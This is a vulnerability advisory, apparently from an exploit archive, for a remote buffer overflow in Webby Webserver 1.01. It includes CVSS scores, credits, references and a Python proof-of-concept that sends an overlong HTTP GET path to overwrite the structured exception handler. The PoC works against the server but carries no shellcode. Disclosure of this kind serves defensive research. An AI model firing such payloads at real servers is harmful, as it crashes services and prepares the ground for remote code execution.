Webby Webserver 1.01 Buffer overflow vulnerability

2010.05.31
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

--------------------------------------------- Webby Webserver v1.01 - Buffer overflow vulnerability with overwritten structured exception handler (SEH) Date: 25.05.2010 --------------------------------------------- - Description Webby is a small webserver for the windows operating system. - buffer overflow vulnerability The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs. - Solution No known solution available. No contact details of the author found. - Credits The vulnerability was discovered by Michael Messner from Integralis michael#dot#messner#at#integralis#dot#com - Timeline 25.05.2010 - Vulnerability discovered - Reference Download vulnerable software http://www.shareware.de/webby-webserver/ - POC #!/usr/bin/python import socket import sys import os.path import time if len(sys.argv) < 2: print "Usage: webby.py <IP> <port>" sys.exit(0) ips = sys.argv[1] port = int(sys.argv[2]) string = "A"*790 string += "\x90"*4 string += "\x42"*105 method = "GET" print "starting POC for:", ips print "" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: connect=s.connect((ips, port)) except: print "no connection possible" sys.exit(1) payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a' print "\r\nsending payload" print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string))) print "..." print payload s.send(payload) print "finished with method %s and payload %s" % (method,payload) print "... check SEH"

References:

http://xforce.iss.net/xforce/xfdb/58892
http://www.securityfocus.com/bid/40353
http://www.securityfocus.com/archive/1/archive/1/511428/100/0/threaded
http://www.exploit-db.com/exploits/12740


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top